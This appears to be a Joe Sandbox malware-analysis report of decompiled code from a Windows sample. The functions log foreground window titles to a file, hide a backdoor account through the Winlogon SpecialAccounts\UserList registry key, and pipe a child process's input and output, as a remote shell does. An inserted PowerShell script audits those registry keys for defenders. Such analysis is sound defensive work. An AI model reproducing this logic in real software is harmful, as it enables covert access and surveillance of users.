                                                                    				intOrPtr _t61;
                                                                    				intOrPtr _t63;
                                                                    				long _t65;
                                                                    				intOrPtr _t66;
                                                                    				void* _t70;
                                                                    				void* _t73;
                                                                    				intOrPtr _t83;
                                                                    				void* _t94;
                                                                    				void* _t97;
                                                                    				void* _t98;
                                                                    				void* _t100;
                                                                    
                                                                    				_t94 = __edx;
                                                                    				_v16 = __ecx;
                                                                    				E02D11052( &_v536, 0, 0x208);
                                                                    				_v8 = 0;
                                                                    				_t35 = GetWindowTextW(GetForegroundWindow(),  &_v536, 0x104);
                                                                    				_t106 = _t35;
                                                                    				if(_t35 <= 0) {
                                                                    					E02D132FF( &_v8, _t94, L"{Unknown}");
                                                                    				} else {
                                                                    					_t73 = E02D135E5( &_v12,  &_v536);
                                                                    					E02D13335(E02D1346A( &_v8, _t94, _t106, "{"), _t106, _t73);
                                                                    					E02D1346A(_t74, _t94, _t106, "}");
                                                                    					E02D15EA5(_v12);
                                                                    					_v12 = 0;
                                                                    				}
                                                                    				_t37 =  *0x2d296a0; // 0x0
                                                                    				_t39 = lstrlenW(_t37 + 0x210);
                                                                    				_t40 =  *0x2d296a0; // 0x0
                                                                    				if(_t39 == 0) {
                                                                    					L6:
                                                                    					_t41 = _t40 + 0x210;
                                                                    					__eflags = _t41;
                                                                    					lstrcpyW(_t41, _v8);
                                                                    					_t43 =  *0x2d296a0; // 0x0
                                                                    					 *((intOrPtr*)(_t43 + 0xa10)) = 0;
                                                                    				} else {
                                                                    					_t70 = E02D13248( &_v8, E02D135E5( &_v12, _t40 + 0x210));
                                                                    					E02D15EA5(_v12);
                                                                    					_t40 =  *0x2d296a0; // 0x0
                                                                    					_v12 = 0;
                                                                    					if(_t70 == 0) {
                                                                    						goto L6;
                                                                    					} else {
                                                                    						 *(_t40 + 0xa10) = 1;
                                                                    					}
                                                                    				}
                                                                    				_t44 = CreateFileW( *(_t43 + 0xc), 4, 1, 0, 4, 0x80, 0);
                                                                    				_t83 =  *0x2d296a0; // 0x0
                                                                    				 *(_t83 + 4) = _t44;
                                                                    				if( *((intOrPtr*)(_t83 + 0xa10)) == 0) {
                                                                    					_t21 = _t83 + 8; // 0x8
                                                                    					_t98 = L"\r\n";
                                                                    					_t54 = lstrlenW(_t98);
                                                                    					_t55 =  *0x2d296a0; // 0x0
                                                                    					WriteFile( *(_t55 + 4), _t98, _t54, _t21, 0);
                                                                    					_t57 =  *0x2d296a0; // 0x0
                                                                    					_t59 = E02D13261( &_v8);
                                                                    					_t61 =  *0x2d296a0; // 0x0
                                                                    					WriteFile( *(_t61 + 4), _v8, _t59 + _t59, _t57 + 8, 0);
                                                                    					_t63 =  *0x2d296a0; // 0x0
                                                                    					_t100 = L"\r\n";
                                                                    					_t65 = lstrlenW(_t100);
                                                                    					_t66 =  *0x2d296a0; // 0x0
                                                                    					WriteFile( *(_t66 + 4), _t100, _t65, _t63 + 8, 0);
                                                                    					_t83 =  *0x2d296a0; // 0x0
                                                                    				}
                                                                    				_t97 = _v16;
                                                                    				_t28 = _t83 + 8; // 0x8
                                                                    				_t46 = lstrlenW(_t97);
                                                                    				_t48 =  *0x2d296a0; // 0x0
                                                                    				WriteFile( *(_t48 + 4), _t97, _t46 + _t46, _t28, 0);
                                                                    				_t50 =  *0x2d296a0; // 0x0
                                                                    				CloseHandle( *(_t50 + 4));
                                                                    				return E02D15EA5(_v8);
                                                                    			}

                                                                    0x02d18e66
                                                                    0x02d18e79
                                                                    0x02d18e84
                                                                    0x02d18e8c
                                                                    0x02d18ea2
                                                                    0x02d18ea8
                                                                    0x02d18eaa
                                                                    0x02d18ef5
                                                                    0x02d18eac
                                                                    0x02d18eb6
                                                                    0x02d18ecf
                                                                    0x02d18edb
                                                                    0x02d18ee3
                                                                    0x02d18ee8
                                                                    0x02d18ee8
                                                                    0x02d18efa
                                                                    0x02d18f0b
                                                                    0x02d18f0f
                                                                    0x02d18f14
                                                                    0x02d18f4f
                                                                    0x02d18f52
                                                                    0x02d18f52
                                                                    0x02d18f58
                                                                    0x02d18f5e
                                                                    0x02d18f63
                                                                    0x02d18f16
                                                                    0x02d18f28
                                                                    0x02d18f32
                                                                    0x02d18f37
                                                                    0x02d18f3c
                                                                    0x02d18f41
                                                                    0x00000000
                                                                    0x02d18f43
                                                                    0x02d18f43
                                                                    0x02d18f43
                                                                    0x02d18f41
                                                                    0x02d18f79
                                                                    0x02d18f7f
                                                                    0x02d18f91
                                                                    0x02d18f94
                                                                    0x02d18f98
                                                                    0x02d18f9b
                                                                    0x02d18fa2
                                                                    0x02d18fa5
                                                                    0x02d18fae
                                                                    0x02d18fb0
                                                                    0x02d18fc1
                                                                    0x02d18fc9
                                                                    0x02d18fd2
                                                                    0x02d18fd4
                                                                    0x02d18fd9
                                                                    0x02d18fe5
                                                                    0x02d18fe8
                                                                    0x02d18ff1
                                                                    0x02d18ff3
                                                                    0x02d18ff3
                                                                    0x02d18ff9
                                                                    0x02d18ffc
                                                                    0x02d19003
                                                                    0x02d19008
                                                                    0x02d19011
                                                                    0x02d19013
                                                                    0x02d1901b
                                                                    0x02d1902d

                                                                    APIs
                                                                    • GetForegroundWindow.USER32(?,?,?), ref: 02D18E8F
                                                                    • GetWindowTextW.USER32 ref: 02D18EA2
                                                                    • lstrlenW.KERNEL32(-00000210,{Unknown},?,?), ref: 02D18F0B
                                                                    • lstrcpyW.KERNEL32 ref: 02D18F58
                                                                    • CreateFileW.KERNEL32(?,00000004,00000001,00000000,00000004,00000080,00000000,?,?), ref: 02D18F79
                                                                    • lstrlenW.KERNEL32(02D24AD0,00000008,00000000,?,?), ref: 02D18FA2
                                                                    • WriteFile.KERNEL32(?,02D24AD0,00000000,?,?), ref: 02D18FAE
                                                                    • WriteFile.KERNEL32(?,?,00000000,-00000008,00000000,?,?), ref: 02D18FD2
                                                                    • lstrlenW.KERNEL32(02D24AD0,-00000008,00000000,?,?), ref: 02D18FE5
                                                                    • WriteFile.KERNEL32(?,02D24AD0,00000000,?,?), ref: 02D18FF1
                                                                    • lstrlenW.KERNEL32(?,00000008,00000000,?,?), ref: 02D19003
                                                                    • WriteFile.KERNEL32(?,?,00000000,?,?), ref: 02D19011
                                                                    • CloseHandle.KERNEL32(?,?,?), ref: 02D1901B
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,00000000,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D135EE
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D13605
                                                                      • Part of subcall function 02D135E5: lstrcpyW.KERNEL32 ref: 02D13620
                                                                      • Part of subcall function 02D13335: lstrcatW.KERNEL32(00000000,745D0770), ref: 02D13365
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlen$File$Write$Windowlstrcpy$CloseCreateForegroundFreeHandleTextVirtuallstrcat
                                                                    • String ID: {Unknown}
                                                                    • API String ID: 2314120260-4054869793
                                                                    • Opcode ID: ccb5570c773ec1bfce2f93919e36a5bd50e4bf4ac78fdd1b9a6feea855d2bc53
                                                                    • Instruction ID: 84dce999c596c811c41abf87f2c49cddd2f64a6e8cae5638fdc3d9eca6b31b72
                                                                    • Opcode Fuzzy Hash: ccb5570c773ec1bfce2f93919e36a5bd50e4bf4ac78fdd1b9a6feea855d2bc53
                                                                    • Instruction Fuzzy Hash: 0D519071A40244FFDB10EF54EC99EDA77A9EF64304F5544A4E905A7340DB31AD18CF64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E02D1E3FA(void* __edx, char _a4, char _a8) {
                                                                    				void* _v12;
                                                                    				char _v16;
                                                                    				int _v20;
                                                                    				char _v36;
                                                                    				void _v44;
                                                                    				void* _t51;
                                                                    				int _t56;
                                                                    				int _t70;
                                                                    				void* _t104;
                                                                    				signed int _t115;
                                                                    				void* _t161;
                                                                    				void* _t162;
                                                                    				void* _t163;
                                                                    				int _t172;
                                                                    
                                                                    				_t161 = __edx;
                                                                    				InitializeCriticalSection( &_v44);
                                                                    				_t115 = 6;
                                                                    				DeleteCriticalSection(memcpy(0x2e5e020,  &_v44, _t115 << 2));
                                                                    				EnterCriticalSection(0x2e5e020);
                                                                    				_t167 = _a4;
                                                                    				_t111 = _a8;
                                                                    				 *0x2e5e084 = _a4;
                                                                    				 *0x2e5e078 = 0x2e5d000;
                                                                    				 *0x2e5e074 = _a8;
                                                                    				if(E02D1DE1F(_t161) == 0) {
                                                                    					_t51 = E02D1F51D();
                                                                    					__eflags = _t51 - 6;
                                                                    					if(_t51 < 6) {
                                                                    						L14:
                                                                    						E02D14F2B(_t167, E02D14B91( &_v36, 2, 0x2e5e07c, 0x2e5e080));
                                                                    						E02D14B6E( &_v36);
                                                                    						LeaveCriticalSection(0x2e5e020);
                                                                    						__eflags = 0;
                                                                    						return 0;
                                                                    					}
                                                                    					_t56 = E02D1F4CE();
                                                                    					__eflags = _t56;
                                                                    					if(_t56 != 0) {
                                                                    						goto L14;
                                                                    					}
                                                                    					__eflags = E02D1FBFC() - 1;
                                                                    					if(__eflags == 0) {
                                                                    						_t162 = 8;
                                                                    						E02D13437(0x2e5e07c, E02D134A7( &_a4, _t162, __eflags));
                                                                    						E02D15EA5(_a4);
                                                                    						_t163 = 8;
                                                                    						E02D13437(0x2e5e080, E02D134A7( &_a4, _t163, __eflags));
                                                                    						E02D15EA5(_a4);
                                                                    						_t172 = 0;
                                                                    						RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList", 0, 0, 0, 0xf013f, 0,  &_v12,  &_v20);
                                                                    						_v16 = 0;
                                                                    						RegSetValueExW(_v12,  *0x2e5e07c, 0, 4,  &_v16, 4);
                                                                    						RegCloseKey(_v12);
                                                                    						_t70 = E02D1D418(0x2e5e07c, 0x2e5e080);
                                                                    						__eflags = _t70;
                                                                    						if(_t70 != 0) {
                                                                    							E02D2165B(_a8, _t163, E02D135E5( &_a4, L"rudp"), 0x2e5e07c);
                                                                    							E02D15EA5(_a4);
                                                                    							E02D2165B(_a8, _t163, E02D135E5( &_a8, L"rpdp"), 0x2e5e080);
                                                                    							E02D15EA5(_a8);
                                                                    							E02D11F4B(0x2e5e038, E02D1E2E7, 0x2e5e020);
                                                                    							LeaveCriticalSection(0x2e5e020);
                                                                    							return 1;
                                                                    						}
                                                                    						E02D14F2B(_t167, E02D14B91( &_v36, 9, 0x2e5e07c, 0x2e5e080));
                                                                    						E02D14B6E( &_v36);
                                                                    						L12:
                                                                    						LeaveCriticalSection(0x2e5e020);
                                                                    						return _t172;
                                                                    					}
                                                                    					E02D14F2B(_t167, E02D14B91( &_v36, 1, 0x2e5e07c, 0x2e5e080));
                                                                    					E02D14B6E( &_v36);
                                                                    					_t172 = 0;
                                                                    					goto L12;
                                                                    				}
                                                                    				E02D13437(0x2e5e07c, E02D2168E(_t111, _t161,  &_a8, E02D135E5( &_a4, L"rudp")));
                                                                    				E02D15EA5(_a8);
                                                                    				_a8 = 0;
                                                                    				E02D15EA5(_a4);
                                                                    				E02D13437(0x2e5e080, E02D2168E(_t111, _t161,  &_a8, E02D135E5( &_a4, L"rpdp")));
                                                                    				E02D15EA5(_a8);
                                                                    				_a8 = 0;
                                                                    				E02D15EA5(_a4);
                                                                    				if(E02D13261(0x2e5e07c) != 0 || E02D13261(0x2e5e080) != 0) {
                                                                    					E02D14F2B(_t167, E02D14B91( &_v36, 8, 0x2e5e07c, 0x2e5e080));
                                                                    					E02D14B6E( &_v36);
                                                                    				} else {
                                                                    					_t104 = E02D135E5( &_a4, 0x2d24648);
                                                                    					E02D14F2B(_t167, E02D14B91( &_v36, 8, E02D135E5( &_a8, 0x2d24648), _t104));
                                                                    					E02D14B6E( &_v36);
                                                                    					E02D15EA5(_a8);
                                                                    					_a8 = 0;
                                                                    					E02D15EA5(_a4);
                                                                    				}
                                                                    				_t172 = 1;
                                                                    				goto L12;
                                                                    			}

                                                                    0x02d1e3fa
                                                                    0x02d1e407
                                                                    0x02d1e40f
                                                                    0x02d1e41e
                                                                    0x02d1e42a
                                                                    0x02d1e430
                                                                    0x02d1e433
                                                                    0x02d1e436
                                                                    0x02d1e43c
                                                                    0x02d1e446
                                                                    0x02d1e453
                                                                    0x02d1e554
                                                                    0x02d1e559
                                                                    0x02d1e55c
                                                                    0x02d1e6cf
                                                                    0x02d1e6e6
                                                                    0x02d1e6ee
                                                                    0x02d1e6f4
                                                                    0x02d1e6fa
                                                                    0x00000000
                                                                    0x02d1e6fa
                                                                    0x02d1e562
                                                                    0x02d1e567
                                                                    0x02d1e569
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d1e574
                                                                    0x02d1e577
                                                                    0x02d1e5a6
                                                                    0x02d1e5b5
                                                                    0x02d1e5bd
                                                                    0x02d1e5c4
                                                                    0x02d1e5d5
                                                                    0x02d1e5dd
                                                                    0x02d1e5e5
                                                                    0x02d1e5ff
                                                                    0x02d1e60a
                                                                    0x02d1e61a
                                                                    0x02d1e623
                                                                    0x02d1e62f
                                                                    0x02d1e634
                                                                    0x02d1e636
                                                                    0x02d1e683
                                                                    0x02d1e68b
                                                                    0x02d1e6a1
                                                                    0x02d1e6a9
                                                                    0x02d1e6be
                                                                    0x02d1e6c4
                                                                    0x00000000
                                                                    0x02d1e6cc
                                                                    0x02d1e64b
                                                                    0x02d1e653
                                                                    0x02d1e658
                                                                    0x02d1e65e
                                                                    0x00000000
                                                                    0x02d1e664
                                                                    0x02d1e590
                                                                    0x02d1e598
                                                                    0x02d1e59d
                                                                    0x00000000
                                                                    0x02d1e59d
                                                                    0x02d1e478
                                                                    0x02d1e480
                                                                    0x02d1e48a
                                                                    0x02d1e48d
                                                                    0x02d1e4b3
                                                                    0x02d1e4bb
                                                                    0x02d1e4c3
                                                                    0x02d1e4c6
                                                                    0x02d1e4d7
                                                                    0x02d1e53f
                                                                    0x02d1e547
                                                                    0x02d1e4e4
                                                                    0x02d1e4ed
                                                                    0x02d1e50a
                                                                    0x02d1e512
                                                                    0x02d1e51a
                                                                    0x02d1e522
                                                                    0x02d1e525
                                                                    0x02d1e525
                                                                    0x02d1e54e
                                                                    0x00000000

                                                                    APIs
                                                                    • InitializeCriticalSection.KERNEL32(?,?,?), ref: 02D1E407
                                                                    • DeleteCriticalSection.KERNEL32(?,?,?), ref: 02D1E41E
                                                                    • EnterCriticalSection.KERNEL32(02E5E020,?,?), ref: 02D1E42A
                                                                      • Part of subcall function 02D1DE1F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,?,02E5E020,?,?,02D1E451,?,?), ref: 02D1DE51
                                                                    • RegCreateKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList,00000000,00000000,00000000,000F013F,00000000,?,?,00000000,00000000,?,?), ref: 02D1E5FF
                                                                    • RegSetValueExW.ADVAPI32(?,00000000,00000004,?,00000004,?,?), ref: 02D1E61A
                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 02D1E623
                                                                    • LeaveCriticalSection.KERNEL32(02E5E020,00000000,02E5E07C,02E5E080,?,?), ref: 02D1E65E
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,00000000,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D135EE
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D13605
                                                                      • Part of subcall function 02D135E5: lstrcpyW.KERNEL32 ref: 02D13620
                                                                      • Part of subcall function 02D13437: lstrcpyW.KERNEL32 ref: 02D1345C
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                      • Part of subcall function 02D13261: lstrlenW.KERNEL32(745D0770,02D13646,?,?,?,02D2150A,02D235DB,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,02D235AB,00000000,745D0770,00000000), ref: 02D13268
                                                                    • LeaveCriticalSection.KERNEL32(02E5E020,00000000,rpdp,02E5E080,00000000,rudp,02E5E07C,02E5E07C,02E5E080,?,?), ref: 02D1E6C4
                                                                    • LeaveCriticalSection.KERNEL32(02E5E020,00000000,?,?), ref: 02D1E6F4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$Leavelstrlen$lstrcpy$CloseCreateDeleteEnterFreeInitializeOpenValueVirtual
                                                                    • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList$rpdp$rudp
                                                                    • API String ID: 2046459734-177601018
                                                                    • Opcode ID: 2303524d0e9b763be83a07911a0a57152e99df0f104e44ea75d71d4596987d6a
                                                                    • Instruction ID: 2750787f81428820550fdc208188f246e16d9c501ac41b518575bfbf2a77fe3e
                                                                    • Opcode Fuzzy Hash: 2303524d0e9b763be83a07911a0a57152e99df0f104e44ea75d71d4596987d6a
                                                                    • Instruction Fuzzy Hash: 08715071690228BAEB14FF60FC95EAE776AEF58714F408415ED06A6B80DB349E05CF70
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%
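
                                                                    Added example (not part of the Joe Sandbox report and not code from the sample): a PowerShell audit of the two registry locations the function above touches. It assumes Windows PowerShell 5.1 on a 64-bit host, run elevated; the function names Get-HiddenLogonAccount and Test-TermServiceParameters are the example's own. The access masks in the API list decode as 0x20119 = KEY_READ | KEY_WOW64_64KEY (RegOpenKeyExW on TermService\Parameters) and 0xF013F = KEY_ALL_ACCESS | KEY_WOW64_64KEY (RegCreateKeyExA on SpecialAccounts\UserList), so the 32-bit sample deliberately writes the native 64-bit view; the audit therefore has to read that same view. The report only shows the sample opening TermService\Parameters for reading, so the ServiceDll check below is what a defender would verify there, not something the sample is shown doing.

```powershell
# Added example: audit of the registry locations touched by the decompiled function.
# Not code from the Joe Sandbox report or the sample. Assumes Windows PowerShell 5.1,
# 64-bit, elevated. Function names are the example's own.

$UserListKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'
$TermSvcKey  = 'HKLM:\SYSTEM\CurrentControlSet\Services\TermService\Parameters'

function Get-HiddenLogonAccount {
    # One object per value under UserList. The sample writes a REG_DWORD (type 4,
    # 4 bytes) whose value name is the account name; data 0 hides that account
    # from the logon (Welcome) screen. The key does not exist on a default
    # install, so its mere presence is worth reporting.
    if (-not (Test-Path -LiteralPath $UserListKey)) {
        Write-Verbose 'SpecialAccounts\UserList does not exist (expected on a clean system)'
        return
    }
    $key        = Get-Item -LiteralPath $UserListKey
    $localUsers = @(Get-LocalUser | Select-Object -ExpandProperty Name)
    foreach ($name in $key.GetValueNames()) {
        $data = $key.GetValue($name)
        $kind = $key.GetValueKind($name)
        [pscustomobject]@{
            Account      = $name
            Data         = $data
            Kind         = $kind
            HiddenFromUI = ($kind -eq 'DWord' -and $data -eq 0)
            # A hidden name that is also a real local account is the case to investigate;
            # the report's "Contains functionality to create new users" signature means
            # the account may have been created by the sample rather than pre-existing.
            IsLocalUser  = ($localUsers -contains $name)
        }
    }
}

function Test-TermServiceParameters {
    # The sample only opens this key with KEY_READ | KEY_WOW64_64KEY; what it does
    # with the contents is not shown, so this check is the example's assumption of
    # what to verify: ServiceDll must still resolve to the catalog-signed
    # termsrv.dll under System32.
    $props    = Get-ItemProperty -LiteralPath $TermSvcKey -ErrorAction Stop
    $dll      = [Environment]::ExpandEnvironmentVariables($props.ServiceDll)
    $expected = Join-Path $env:SystemRoot 'System32\termsrv.dll'
    $sig      = Get-AuthenticodeSignature -LiteralPath $dll   # validates catalog signatures on Windows 8+
    [pscustomobject]@{
        ServiceDll   = $dll
        PathExpected = ($dll -ieq $expected)
        SignatureOK  = ($sig.Status -eq 'Valid')
        Signer       = $sig.SignerCertificate.Subject
    }
}

Get-HiddenLogonAccount | Format-Table -AutoSize
Test-TermServiceParameters | Format-List
```

Run it from a 64-bit PowerShell: a 32-bit host would be redirected to the WOW6432Node view for the SOFTWARE hive and would miss exactly the entry the sample wrote with KEY_WOW64_64KEY. An account that shows HiddenFromUI and IsLocalUser both true, or a ServiceDll that is not the expected path or not validly signed, is the finding to act on.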

                                                                    C-Code - Quality: 100%
                                                                    			/* Sets up a child process whose standard handles are redirected through two anonymous
                                                                    			   pipes, plus a worker thread and a stop event, all kept in globals at 0x2d29558..0x2d29570
                                                                    			   (the session block). _a4 is typed char by the decompiler but is used as a pointer to a
                                                                    			   VirtualAlloc'd string: E02D1362D copies it out (lstrcpyW) and E02D15EA5 releases it
                                                                    			   (VirtualFree). _t95 and _t101 are register-carried values the decompiler did not declare.
                                                                    			   Returns 1 on success, 0 after the L7 cleanup path. */
                                                                    			E02D1EAFB(void* __eflags, char _a4) {
                                                                    				void* _v8;                                 /* pipe 1, write end (child side) */
                                                                    				void* _v12;                                /* pipe 1, read end (parent side) */
                                                                    				void* _v16;                                /* inheritable duplicate of _v8 (child side) */
                                                                    				void* _v20;                                /* pipe 2, write end (parent side); later passed by address to E02D1E891 */
                                                                    				void* _v24;                                /* pipe 2, read end (child side) */
                                                                    				struct _SECURITY_ATTRIBUTES _v36;
                                                                    				void* _t54;
                                                                    				void* _t61;
                                                                    				void* _t64;
                                                                    				int _t66;
                                                                    				void* _t76;
                                                                    				int _t94;                                  /* return value */
                                                                    				void* _t95;
                                                                    
                                                                    				E02D1EA89(0x2d29558);                      /* tear down any previous session: SetEvent, WaitForSingleObject on the thread at *0x2d2956c for 0x1388 = 5000 ms, then TerminateThread (see subcall list) */
                                                                    				_v12 = _v12 & 0x00000000;
                                                                    				_v16 = _v16 & 0x00000000;
                                                                    				_v8 = _v8 & 0x00000000;
                                                                    				_t94 = 1;                                  /* success unless the L7 path is taken */
                                                                    				_v20 = _v20 & 0x00000000;
                                                                    				_v24 = _v24 & 0x00000000;
                                                                    				_v36.lpSecurityDescriptor = _v36.lpSecurityDescriptor & 0x00000000;
                                                                    				_v36.nLength = 0xc;                        /* sizeof(SECURITY_ATTRIBUTES) == 12: this is a 32-bit image */
                                                                    				_v36.bInheritHandle = 1;                   /* both pipes are created inheritable; non-inheritable copies of the parent's ends are made below */
                                                                    				if(CreatePipe( &_v12,  &_v8,  &_v36, 0) == 0) {
                                                                    					L7:                                    /* common failure path: close every handle, reset the session block, return 0 */
                                                                    					E02D1EC8C( &_v12);                     /* E02D1EC8C -> CloseHandle (see subcall list) */
                                                                    					E02D1EC8C( &_v8);
                                                                    					E02D1EC8C( &_v16);
                                                                    					E02D1EC8C( &_v20);
                                                                    					E02D1EC8C( &_v24);
                                                                    					E02D1EA89(0x2d29558);
                                                                    					_t94 = 0;
                                                                    				} else {
                                                                    					_t54 = GetCurrentProcess();
                                                                    					/* inheritable copy of pipe 1's write end: dwDesiredAccess 0, bInheritHandle 1, dwOptions 2 = DUPLICATE_SAME_ACCESS; then create pipe 2 */
                                                                    					if(DuplicateHandle(GetCurrentProcess(), _v8, _t54,  &_v16, 0, 1, 2) == 0 || CreatePipe( &_v24,  &_v20,  &_v36, 0) == 0) {
                                                                    						goto L7;
                                                                    					} else {
                                                                    						_t61 = GetCurrentProcess();
                                                                    						/* non-inheritable copy of pipe 1's read end, stored directly in global 0x2d29560 (parent reads child output here) */
                                                                    						if(DuplicateHandle(GetCurrentProcess(), _v12, _t61, 0x2d29560, 0, 0, 2) == 0) {
                                                                    							goto L7;
                                                                    						} else {
                                                                    							_t64 = GetCurrentProcess();
                                                                    							/* non-inheritable copy of pipe 2's write end, stored in global 0x2d29564 (parent writes child input here) */
                                                                    							_t66 = DuplicateHandle(GetCurrentProcess(), _v20, _t64, 0x2d29564, 0, 0, 2);
                                                                    							_t101 = _t66;
                                                                    							if(_t66 == 0) {
                                                                    								goto L7;
                                                                    							} else {
                                                                    								E02D1EC8C( &_v12);             /* close the inheritable originals of the parent's ends so only the child-side ends are inherited */
                                                                    								E02D1EC8C( &_v20);
                                                                    								E02D1362D(_t95,  &_a4);        /* lstrcpyW: copy the program/command string out of _a4 */
                                                                    								/* E02D1E891 -> CreateProcessW with the child-side handles _v8, _v24, _v16 (consistent with child stdout/stderr on pipe 1 and stdin on pipe 2);
                                                                    								   &_v20 is passed after _v20 was closed, so it presumably receives the new process handle */
                                                                    								if(E02D1E891(_t95, _t101,  &_v20, _v8, _v24, _v16) == 0) {
                                                                    									goto L7;
                                                                    								} else {
                                                                    									E02D1EC8C( &_v8);          /* the child now owns its ends; drop the parent's copies of them */
                                                                    									E02D1EC8C( &_v24);
                                                                    									E02D1EC8C( &_v16);
                                                                    									 *0x2d29568 = CreateEventA(0, 1, 0, 0);   /* manual-reset, initially non-signaled, unnamed stop event (signaled by E02D1EA89) */
                                                                    									_t76 = CreateThread(0, 0, E02D1E92A, 0x2d29558, 0, 0x2d29570);   /* worker thread E02D1E92A receives the session block; thread id stored at 0x2d29570 */
                                                                    									 *0x2d2956c = _t76;        /* thread handle that E02D1EA89 waits on (5 s) and terminates with exit code 0xFE */
                                                                    									if(_t76 == 0) {
                                                                    										goto L7;
                                                                    									}
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				E02D15EA5(_a4);                            /* VirtualFree the caller's string buffer on both success and failure */
                                                                    				return _t94;
                                                                    			}
                                                                    Instruction addresses of the decompiled lines above (side-by-side address column flattened by extraction): 0x02d1eb09 to 0x02d1ec89.

                                                                    APIs
                                                                      • Part of subcall function 02D1EA89: GetCurrentThreadId.KERNEL32 ref: 02D1EA95
                                                                      • Part of subcall function 02D1EA89: SetEvent.KERNEL32(00000000), ref: 02D1EAA9
                                                                      • Part of subcall function 02D1EA89: WaitForSingleObject.KERNEL32(02D2956C,00001388), ref: 02D1EAB6
                                                                      • Part of subcall function 02D1EA89: TerminateThread.KERNEL32(02D2956C,000000FE), ref: 02D1EAC7
                                                                    • CreatePipe.KERNEL32(00000000,00000000,?,00000000,?,?,00000000), ref: 02D1EB41
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000001,00000002,?,00000000), ref: 02D1EB5E
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 02D1EB64
                                                                    • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 02D1EB6D
                                                                    • CreatePipe.KERNEL32(00000000,00000000,0000000C,00000000,?,00000000), ref: 02D1EB85
                                                                    • GetCurrentProcess.KERNEL32(02D29560,00000000,00000000,00000002,?,00000000), ref: 02D1EB9E
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 02D1EBA4
                                                                    • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 02D1EBA7
                                                                    • GetCurrentProcess.KERNEL32(02D29564,00000000,00000000,00000002,?,00000000), ref: 02D1EBBC
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 02D1EBC2
                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 02D1EC18
                                                                    • CreateThread.KERNEL32 ref: 02D1EC38
                                                                    • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 02D1EBC5
                                                                      • Part of subcall function 02D1EC8C: CloseHandle.KERNEL32(02D29568,02D29558,02D1EADC,?,00000000,02D12A8C,00000000,exit,00000000,start), ref: 02D1EC96
                                                                      • Part of subcall function 02D1362D: lstrcpyW.KERNEL32 ref: 02D13657
                                                                      • Part of subcall function 02D1E891: CreateProcessW.KERNEL32 ref: 02D1E8E3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
